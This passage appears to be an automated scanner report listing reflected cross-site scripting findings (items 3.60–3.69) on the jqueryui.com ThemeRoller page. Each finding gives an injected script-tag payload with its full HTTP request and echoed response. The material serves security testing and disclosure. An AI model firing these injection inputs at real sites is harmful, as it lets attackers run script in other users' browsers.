GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88cfb"><script>alert(1)</script>71936ccf771 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e81"><script>alert(1)</script>3489c3a9abe was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccd5"><script>alert(1)</script>cf0fd2d235e was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24500"><script>alert(1)</script>c3b535455c0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff54"><script>alert(1)</script>46d7472778c was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ec"><script>alert(1)</script>a651755401d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa755"><script>alert(1)</script>9e8658b4fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?aa755"><script>alert(1)</script>9e8658b4fc4=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117096

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&aa755"><script>alert(1)</script>9e8658b4fc4=1" type="text/css" media="all" />
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbeff"><script>alert(1)</script>a1aae8f9b17 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.68. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d5c6"><script>alert(1)</script>1cf7b57c6b was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be49"><script>alert(1)</script>a6f58046687 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

